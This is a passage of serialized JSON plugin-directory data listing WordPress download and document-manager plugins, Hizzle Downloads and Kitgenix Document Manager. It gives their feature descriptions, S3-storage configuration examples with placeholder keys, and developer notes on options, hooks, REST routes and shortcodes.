more\u003C\u002Fp>\n","Download manager with multisite support. Stats charts, shortcodes for download buttons and forms, easy file uploads, and much more.",4570,"2012-12-09T18:05:00.000Z","3.5.0","3.1.0",[20,238,21,239,23],"download-manager","file-manager","http:\u002F\u002Fbqplugins.com\u002Fbq-download","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-manager-ms.1.1.0.zip",85,{"slug":244,"name":245,"version":246,"author":247,"author_profile":248,"description":249,"short_description":250,"active_installs":28,"downloaded":251,"rating":29,"num_ratings":29,"last_updated":252,"tested_up_to":253,"requires_at_least":254,"requires_php":253,"tags":255,"homepage":258,"download_link":259,"security_score":260,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"hizzle-downloads","Simple Download Manager – Hizzle Downloads","1.3.0","Noptin Newsletter Team","https:\u002F\u002Fprofiles.wordpress.org\u002Fpicocodes\u002F","\u003Cp>\u003Cstrong>A simple WordPress download manager for secure file sharing, access control, and download tracking — perfect for digital products.\u003C\u002Fstrong>\u003Cbr \u002F>\n★★★★★\u003C\u002Fp>\n\u003Cp>Do you need a simple yet powerful way to manage file downloads on your WordPress site? This plugin makes it easy to upload, organize, and control access to downloadable files of any type. Whether you are sharing free resources, selling digital products, or delivering private documents, this plugin gives you full control over who can download your files and when.\u003C\u002Fp>\n\u003Cp>With unlimited downloads, flexible restrictions, and detailed tracking, you can confidently provide files to your audience while keeping them secure.\u003C\u002Fp>\n\u003Ch3>Key Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Add unlimited downloadable files\u003C\u002Fstrong> – Add and manage as many downloadable files as you need, with no limits.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Password Protection\u003C\u002Fstrong> – Protect individual files with custom passwords so only authorized users can access them.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Restrict downloads to specific user roles\u003C\u002Fstrong> – Control file access based on WordPress user roles, ensuring that only administrators, editors, subscribers, or custom roles can download.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Restrict downloads to specific IP addresses\u003C\u002Fstrong> – Restrict downloads to specific IP addresses to prevent abuse or unauthorized sharing.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Restrict downloads to specific users\u003C\u002Fstrong> – Assign downloads to specific registered users for secure, private file delivery.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Restrict downloads to newsletter subscribers\u003C\u002Fstrong> – Restrict downloads to Noptin newsletter subscriber, making it an excellent tool for lead generation.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Track file downloads\u003C\u002Fstrong> – Track every file download with detailed statistics, helping you understand how your files are being accessed.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Simple Management\u003C\u002Fstrong> – A user-friendly interface makes uploading and managing files straightforward, even for beginners.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Why Use This Plugin?\u003C\u002Fh3>\n\u003Cp>Managing downloads manually in WordPress can be difficult. Links can be shared publicly, access can’t easily be restricted, and tracking is limited. This plugin solves those problems by giving you advanced tools to:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Protect digital products such as \u003Cstrong>software, themes, and plugins\u003C\u002Fstrong>.\u003C\u002Fli>\n\u003Cli>Share private \u003Cstrong>PDF documents, contracts, or reports\u003C\u002Fstrong> securely with clients.\u003C\u002Fli>\n\u003Cli>Provide exclusive resources like \u003Cstrong>eBooks, whitepapers, and templates\u003C\u002Fstrong> to email subscribers.\u003C\u002Fli>\n\u003Cli>Control access to files for \u003Cstrong>membership sites and online courses\u003C\u002Fstrong>.\u003C\u002Fli>\n\u003Cli>Monitor and analyze download activity to make better business decisions.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Benefits for Your Website\u003C\u002Fh3>\n\u003Cp>By installing this plugin, you’ll be able to:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Grow your email list by offering subscriber-only downloads.\u003C\u002Fli>\n\u003Cli>Monetize your website by controlling access to premium resources.\u003C\u002Fli>\n\u003Cli>Increase security by preventing unauthorized downloads and link sharing.\u003C\u002Fli>\n\u003Cli>Gain insights into how your downloads are performing.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Whether you’re a blogger, developer, marketer, educator, or business owner, this plugin gives you all the tools you need to manage file downloads effectively in WordPress.\u003C\u002Fp>\n\u003Cp>Take control of your downloads today and provide a seamless, secure experience for your users.\u003C\u002Fp>\n\u003Ch3>S3 Sync Configuration\u003C\u002Fh3>\n\u003Cp>The plugin supports automatic syncing of uploaded files to S3-compatible storage services like Amazon S3 and Cloudflare R2.\u003C\u002Fp>\n\u003Cp>To enable this feature, define the following constants in your \u003Ccode>wp-config.php\u003C\u002Fcode> file:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>\u002F\u002F Required constants\ndefine( 'HIZZLE_DOWNLOADS_S3_ENDPOINT', 'https:\u002F\u002F{$bucket}.s3.{$region}.amazonaws.com' );\ndefine( 'HIZZLE_DOWNLOADS_S3_ACCESS_KEY', 'your-access-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_SECRET_KEY', 'your-secret-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_BUCKET', 'your-bucket-name' );\ndefine( 'HIZZLE_DOWNLOADS_S3_REGION', 'your-bucket-region' );\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Ch4>How it works\u003C\u002Fh4>\n\u003Cp>When the S3 credentials are configured:\u003Cbr \u002F>\n– Files uploaded to the \u003Ccode>wp-content\u002Fuploads\u002Fhizzle_uploads\u002F\u003C\u002Fcode> directory are automatically synced to your S3-compatible storage\u003Cbr \u002F>\n– Files are organized by hostname (e.g., \u003Ccode>my-site.com\u002Fpath\u002Fto\u002Ffile.zip\u003C\u002Fcode>)\u003Cbr \u002F>\n– The sync happens automatically when downloads are created or updated\u003C\u002Fp>\n\u003Ch4>Cloudflare R2 Example\u003C\u002Fh4>\n\u003Cp>Set you Clouflare details as shown below:-\u003C\u002Fp>\n\u003Cpre>\u003Ccode>define( 'HIZZLE_DOWNLOADS_S3_ACCESS_KEY', 'your-r2-access-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_SECRET_KEY', 'your-r2-secret-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_BUCKET', 'your-bucket-name' );\ndefine( 'HIZZLE_DOWNLOADS_S3_ENDPOINT', 'https:\u002F\u002Fyour-account-id.r2.cloudflarestorage.com\u002Fyour-bucket-name' );\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Ch4>DigitalOcean Spaces Example\u003C\u002Fh4>\n\u003Cp>Set your DigitalOcean Spaces details as shown below:-\u003C\u002Fp>\n\u003Cpre>\u003Ccode>define( 'HIZZLE_DOWNLOADS_S3_ACCESS_KEY', 'your-spaces-access-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_SECRET_KEY', 'your-spaces-secret-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_BUCKET', 'your-space-name' );\ndefine( 'HIZZLE_DOWNLOADS_S3_ENDPOINT', 'https:\u002F\u002Fyour-space-name.nyc3.digitaloceanspaces.com' );\n\u003C\u002Fcode>\u003C\u002Fpre>\n","Easily add, restrict, and track digital downloads in WordPress — protect files with passwords, user roles, IPs, or subscriber access.",4024,"2026-03-30T06:39:00.000Z","7.0","5.5",[256,238,21,23,257],"digital-downloads","restrict-downloads","https:\u002F\u002Fhizzle.co\u002Fdownload-manager\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhizzle-downloads.1.3.0.zip",100,{"slug":262,"name":263,"version":264,"author":265,"author_profile":266,"description":267,"short_description":268,"active_installs":29,"downloaded":269,"rating":29,"num_ratings":29,"last_updated":270,"tested_up_to":253,"requires_at_least":271,"requires_php":272,"tags":273,"homepage":277,"download_link":278,"security_score":260,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"kitgenix-document-manager","Kitgenix Document Manager","1.0.0","Kitgenix","https:\u002F\u002Fprofiles.wordpress.org\u002Fkitgenix\u002F","\u003Cp>Kitgenix Document Manager lets admins upload documents and share a stable link like:\u003C\u002Fp>\n\u003Cp>\u002Fkitgenix-document-manager\u002F{slug}\u002F\u003C\u002Fp>\n\u003Cp>When you replace the file, the link stays the same and serves the new version.\u003C\u002Fp>\n\u003Ch3>Key Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Stable links: replace the file without changing the URL\u003C\u002Fli>\n\u003Cli>Admin documents table with search, copy link, and “Open link” action\u003C\u002Fli>\n\u003Cli>Quick edit modal (popup) for editing documents without leaving the table\u003C\u002Fli>\n\u003Cli>Document Categories: create categories and assign documents for easier organization\u003C\u002Fli>\n\u003Cli>Visibility controls: Public or Private documents\u003C\u002Fli>\n\u003Cli>Private behavior: redirect to login or return 403\u003C\u002Fli>\n\u003Cli>Serving mode: Inline (browser) or Download (attachment)\u003C\u002Fli>\n\u003Cli>Optional version history per document, including restore\u002Fdelete for older versions\u003C\u002Fli>\n\u003Cli>Bulk version cleanup: delete all old versions for a document (Versions tab + modal action)\u003C\u002Fli>\n\u003Cli>Select from Media Library: optionally pick an existing Media Library file instead of uploading\u003C\u002Fli>\n\u003Cli>Safer serving: correct Content-Type where possible, security headers, and conditional caching for public docs\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Usage\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Go to \u003Cstrong>Kitgenix \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Document Manager\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Add a document (name + optional slug) and upload the initial file\u003C\u002Fli>\n\u003Cli>Copy the stable URL from the table and share it\u003C\u002Fli>\n\u003Cli>To update a document later, use \u003Cstrong>Edit\u003C\u002Fstrong> (modal) and upload a replacement file\u003C\u002Fli>\n\u003Cli>If \u003Cstrong>Keep version history\u003C\u002Fstrong> is enabled for that document, older files will appear in the Versions panel (restore\u002Fdelete)\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>Categories:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Use the \u003Cstrong>Categories\u003C\u002Fstrong> tab to add\u002Fedit\u002Fdelete categories\u003C\u002Fli>\n\u003Cli>Assign a category when adding\u002Fediting a document\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Note: Inline viewing works best for PDFs and images. Office documents (DOCX\u002FXLSX\u002Fetc.) typically download because browsers can’t render them natively.\u003C\u002Fp>\n\u003Ch3>Settings\u003C\u002Fh3>\n\u003Cp>Settings are available under the \u003Cstrong>Settings\u003C\u002Fstrong> tab:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Allowed file extensions\u003C\u002Fli>\n\u003Cli>Default visibility (Public\u002FPrivate)\u003C\u002Fli>\n\u003Cli>Serving mode:\n\u003Cul>\n\u003Cli>Inline (browser)\u003C\u002Fli>\n\u003Cli>Download (attachment)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Versioning defaults (keep history by default, delete old versions when history is disabled)\u003C\u002Fli>\n\u003Cli>Private document behavior (login redirect or 403)\u003C\u002Fli>\n\u003Cli>Delete all plugin data on uninstall (optional)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Frontend card options are available under the \u003Cstrong>Frontend\u003C\u002Fstrong> tab:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Default document card button label\u003C\u002Fli>\n\u003Cli>Button style (Outline or Solid)\u003C\u002Fli>\n\u003Cli>Preview image size\u003C\u002Fli>\n\u003Cli>File type\u002Ffile size alignment\u003C\u002Fli>\n\u003Cli>Button alignment\u003C\u002Fli>\n\u003Cli>Button colors (normal + hover)\u003C\u002Fli>\n\u003Cli>Option to open the “View” button in a new tab\u003C\u002Fli>\n\u003Cli>Toggle showing file type and file size\u003C\u002Fli>\n\u003Cli>Toggle showing document description\u003C\u002Fli>\n\u003Cli>Shortcode Builder (generate a shortcode for one or multiple documents)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Security & Caching\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Private documents are not cached (no-store) and require login (or return 403)\u003C\u002Fli>\n\u003Cli>Public documents use conditional caching (ETag\u002FLast-Modified) so browsers\u002FCDNs can revalidate efficiently (including 304 Not Modified responses)\u003C\u002Fli>\n\u003Cli>Responses include security hardening headers like \u003Ccode>X-Content-Type-Options: nosniff\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Private documents include \u003Ccode>X-Robots-Tag: noindex, nofollow\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin includes a shared “Kitgenix hub” component in wp-admin which may fetch publicly available plugin metadata from WordPress.org using the WordPress core \u003Ccode>plugins_api()\u003C\u002Fcode> function (WordPress.org Plugins API).\u003C\u002Fp>\n\u003Cul>\n\u003Cli>When it runs: only in wp-admin (Kitgenix plugin admin pages)\u003C\u002Fli>\n\u003Cli>Data sent: plugin slug(s) (no personal data)\u003C\u002Fli>\n\u003Cli>Data received: publicly available plugin information (e.g. active installs, ratings)\u003C\u002Fli>\n\u003Cli>Caching: responses are cached locally using transients for ~1 day:\n\u003Cul>\n\u003Cli>\u003Ccode>kitgenix_hub_wporg_active_installs_v1\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_hub_wporg_ratings_v1\u003C\u002Fcode>\u003Cbr \u002F>\n\u003Ch3>Developer Notes (Internal Reference)\u003C\u002Fh3>\n\u003Cp>This section documents internal identifiers used by the plugin (useful for developers, debugging, and advanced users).\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Options (Settings)\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Option name: \u003Ccode>kitgenix_document_manager_settings\u003C\u002Fcode> (constant: \u003Ccode>KITGENIX_DOCUMENT_MANAGER_OPTION_NAME\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>Settings group: \u003Ccode>kitgenix_document_manager_settings_group\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Keys (defaults):\n\u003Cul>\n\u003Cli>\u003Ccode>allowed_extensions\u003C\u002Fcode>: \u003Ccode>[\"pdf\",\"doc\",\"docx\",\"xls\",\"xlsx\",\"ppt\",\"pptx\",\"txt\"]\u003C\u002Fcode> (stored as an array; comma-separated strings are accepted and normalized)\u003C\u002Fli>\n\u003Cli>\u003Ccode>default_visibility\u003C\u002Fcode>: \u003Ccode>public\u003C\u002Fcode> (public|private)\u003C\u002Fli>\n\u003Cli>\u003Ccode>serving_mode\u003C\u002Fcode>: \u003Ccode>attachment\u003C\u002Fcode> (attachment|inline)\u003C\u002Fli>\n\u003Cli>\u003Ccode>keep_version_history\u003C\u002Fcode>: \u003Ccode>true\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>delete_old_versions\u003C\u002Fcode>: \u003Ccode>false\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>private_behavior\u003C\u002Fcode>: \u003Ccode>login\u003C\u002Fcode> (login|403)\u003C\u002Fli>\n\u003Cli>\u003Ccode>delete_data_on_uninstall\u003C\u002Fcode>: \u003Ccode>false\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_label\u003C\u002Fcode>: \u003Ccode>\"View\"\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_style\u003C\u002Fcode>: \u003Ccode>\"outline\"\u003C\u002Fcode> (outline|solid)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_open_new_tab\u003C\u002Fcode>: \u003Ccode>false\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_show_file_type\u003C\u002Fcode>: \u003Ccode>true\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_show_file_size\u003C\u002Fcode>: \u003Ccode>true\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_show_description\u003C\u002Fcode>: \u003Ccode>false\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_image_size\u003C\u002Fcode>: \u003Ccode>96\u003C\u002Fcode> (px)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_meta_alignment\u003C\u002Fcode>: \u003Ccode>\"justify\"\u003C\u002Fcode> (justify|left|center|right)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_alignment\u003C\u002Fcode>: \u003Ccode>\"center\"\u003C\u002Fcode> (justify|left|center|right)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_text_color\u003C\u002Fcode>: \u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_bg_color\u003C\u002Fcode>: \u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_border_color\u003C\u002Fcode>: \u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_hover_text_color\u003C\u002Fcode>: \u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_hover_bg_color\u003C\u002Fcode>: \u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_hover_border_color\u003C\u002Fcode>: \u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Data Model\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Custom Post Type: \u003Ccode>kitgenix_dm_doc\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Taxonomy (categories): \u003Ccode>kitgenix_dm_cat\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Capability: \u003Ccode>manage_kitgenix_document_manager_documents\u003C\u002Fcode> (assigned to Administrators and Shop Managers on activation)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Post Meta\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ccode>_kitgenix_document_manager_current_attachment_id\u003C\u002Fcode> (current attachment ID)\u003C\u002Fli>\n\u003Cli>\u003Ccode>_kitgenix_document_manager_description\u003C\u002Fcode> (optional document description shown on cards)\u003C\u002Fli>\n\u003Cli>\u003Ccode>_kitgenix_document_manager_visibility\u003C\u002Fcode> (\u003Ccode>public\u003C\u002Fcode>|\u003Ccode>private\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>_kitgenix_document_manager_versioning_enabled\u003C\u002Fcode> (0|1)\u003C\u002Fli>\n\u003Cli>\u003Ccode>_kitgenix_document_manager_versions\u003C\u002Fcode> (array of attachment IDs)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Stable Link Endpoint\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Base path: \u003Ccode>\u002Fkitgenix-document-manager\u002F{slug}\u002F\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Query var: \u003Ccode>kitgenix_document_manager_slug\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>REST API\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ccode>GET \u002Fwp-json\u002Fkitgenix-document-manager\u002Fv1\u002Fdoc\u002F{slug}\u003C\u002Fcode>\n\u003Cul>\n\u003Cli>Returns: \u003Ccode>slug\u003C\u002Fcode>, \u003Ccode>title\u003C\u002Fcode>, \u003Ccode>updated\u003C\u002Fcode> (ISO 8601), \u003Ccode>visibility\u003C\u002Fcode>, \u003Ccode>stable_url\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Private documents return 403 when logged out\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Shortcode\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Ccode>[kitgenix_document_manager_link slug=\"my-doc\" label=\"Download\"]\u003C\u002Fcode>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>If \u003Ccode>label\u003C\u002Fcode> is omitted, the document title is used.\u003C\u002Fli>\n\u003Cli>Private documents render nothing for logged-out users.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ccode>[kitgenix_document_manager_document slug=\"my-doc\" button_label=\"View\"]\u003C\u002Fcode>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Renders a small preview (thumbnail\u002Ficon), the document title, file type, file size, and a “View” button.\u003C\u002Fli>\n\u003Cli>Private documents render nothing for logged-out users.\u003C\u002Fli>\n\u003Cli>Optional attributes: \u003Ccode>button_style=\"outline\"|\"solid\"\u003C\u002Fcode>, \u003Ccode>image_size=\"96\"\u003C\u002Fcode>, \u003Ccode>meta_align=\"justify\"|\"left\"|\"center\"|\"right\"\u003C\u002Fcode>, \u003Ccode>button_align=\"justify\"|\"left\"|\"center\"|\"right\"\u003C\u002Fcode>, \u003Ccode>show_description=\"0\"|\"1\"\u003C\u002Fcode>, \u003Ccode>new_tab=\"0\"|\"1\"\u003C\u002Fcode>, \u003Ccode>show_type=\"0\"|\"1\"\u003C\u002Fcode>, \u003Ccode>show_size=\"0\"|\"1\"\u003C\u002Fcode>.\u003C\u002Fli>\n\u003Cli>To render multiple documents inline, use \u003Ccode>slugs\u003C\u002Fcode> instead of \u003Ccode>slug\u003C\u002Fcode>, e.g. \u003Ccode>[kitgenix_document_manager_document slugs=\"doc-a,doc-b,doc-c\"]\u003C\u002Fcode>.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Admin Actions (admin-post.php)\u003C\u002Fh4>\n\u003Cp>The Document Manager screen uses admin-post actions, including:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ccode>kitgenix_document_manager_document_save\u003C\u002Fcode>\n\u003Cul>\n\u003Cli>Nonce field: \u003Ccode>kitgenix_document_manager_document_nonce\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Nonce action: \u003Ccode>kitgenix_document_manager_document_save\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_document_delete\u003C\u002Fcode> (nonce query parameter \u003Ccode>nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_version_restore\u003C\u002Fcode> (nonce query parameter \u003Ccode>nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_version_delete\u003C\u002Fcode> (nonce query parameter \u003Ccode>nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_versions_delete_all\u003C\u002Fcode> (nonce query parameter \u003Ccode>nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_category_save\u003C\u002Fcode>\n\u003Cul>\n\u003Cli>Nonce field: \u003Ccode>kitgenix_document_manager_category_nonce\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Nonce action: \u003Ccode>kitgenix_document_manager_category_save\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_category_delete\u003C\u002Fcode> (nonce query parameter \u003Ccode>nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>WordPress action hook names for the above screen actions:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_document_save\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_document_delete\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_version_restore\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_version_delete\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_versions_delete_all\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_category_save\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_category_delete\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>The (hidden) CPT edit screen metabox uses:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ccode>kitgenix_document_manager_upload_initial\u003C\u002Fcode> (nonce field \u003Ccode>kitgenix_document_manager_file_nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_replace_file\u003C\u002Fcode> (nonce field \u003Ccode>kitgenix_document_manager_file_nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>Visibility\u002Fversioning meta save nonce:\n\u003Cul>\n\u003Cli>Nonce field: \u003Ccode>kitgenix_document_manager_meta_nonce\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Nonce action: \u003Ccode>kitgenix_document_manager_save_meta\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Hooks, Filters & Assets (Internal)\u003C\u002Fh4>\n\u003Cp>This list is intended as a comprehensive map of WordPress integration points used by the plugin.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ccode>plugins_loaded\u003C\u002Fcode> (bootstrap init)\u003C\u002Fli>\n\u003Cli>\u003Ccode>init\u003C\u002Fcode> (register CPT\u002Ftaxonomy; add rewrite rules)\u003C\u002Fli>\n\u003Cli>Filter: \u003Ccode>query_vars\u003C\u002Fcode> (adds query var \u003Ccode>kitgenix_document_manager_slug\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>template_redirect\u003C\u002Fcode> (serves stable link responses)\u003C\u002Fli>\n\u003Cli>\u003Ccode>rest_api_init\u003C\u002Fcode> (registers REST route)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_menu\u003C\u002Fcode> (registers Kitgenix menu + Document Manager submenu)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_head\u003C\u002Fcode> (outputs Kitgenix admin menu icon CSS)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_init\u003C\u002Fcode> (registers Settings API option)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_enqueue_scripts\u003C\u002Fcode> (enqueues Kitgenix hub CSS; enqueues Document Manager admin assets)\u003C\u002Fli>\n\u003Cli>\u003Ccode>add_meta_boxes\u003C\u002Fcode> (adds the CPT file\u002Fvisibility metaboxes)\u003C\u002Fli>\n\u003Cli>\u003Ccode>save_post\u003C\u002Fcode> (saves visibility + versioning meta)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_upload_initial\u003C\u002Fcode> (metabox upload)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_replace_file\u003C\u002Fcode> (metabox replace)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_notices\u003C\u002Fcode> (metabox success\u002Ferror notices via \u003Ccode>kitgenix_dm_notice\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>Filter: \u003Ccode>manage_kitgenix_dm_doc_posts_columns\u003C\u002Fcode> (adds list table columns)\u003C\u002Fli>\n\u003Cli>\u003Ccode>manage_kitgenix_dm_doc_posts_custom_column\u003C\u002Fcode> (renders list table columns)\u003C\u002Fli>\n\u003Cli>Filter: \u003Ccode>post_row_actions\u003C\u002Fcode> (adds “Replace File” row action)\u003C\u002Fli>\n\u003Cli>Filter: \u003Ccode>site_status_tests\u003C\u002Fcode> (registers Site Health test)\u003C\u002Fli>\n\u003Cli>Shortcode: \u003Ccode>kitgenix_document_manager_link\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Other admin UI identifiers:\u003Cbr \u002F>\n– Admin list-table column key: \u003Ccode>kitgenix_dm_actions\u003C\u002Fcode>\u003Cbr \u002F>\n– Version restore notice query arg: \u003Ccode>kitgenix_version_restored=1\u003C\u002Fcode>\u003C\u002Fp>\n\u003Cp>Admin asset handles (wp-admin):\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Styles:\n\u003Cul>\n\u003Cli>\u003Ccode>kitgenix-hub\u003C\u002Fcode> (Kitgenix hub page)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix-admin-ui\u003C\u002Fcode> (shared Kitgenix admin UI)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix-document-manager-admin\u003C\u002Fcode> (Document Manager settings screen)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Scripts:\n\u003Cul>\n\u003Cli>\u003Ccode>kitgenix-admin-tabs\u003C\u002Fcode> (shared Kitgenix tabs UI)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix-document-manager-admin\u003C\u002Fcode> (Document Manager admin JS)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Site Health (Internal)\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Registers Site Health test ID: \u003Ccode>kitgenix_document_manager_uploads\u003C\u002Fcode> (checks 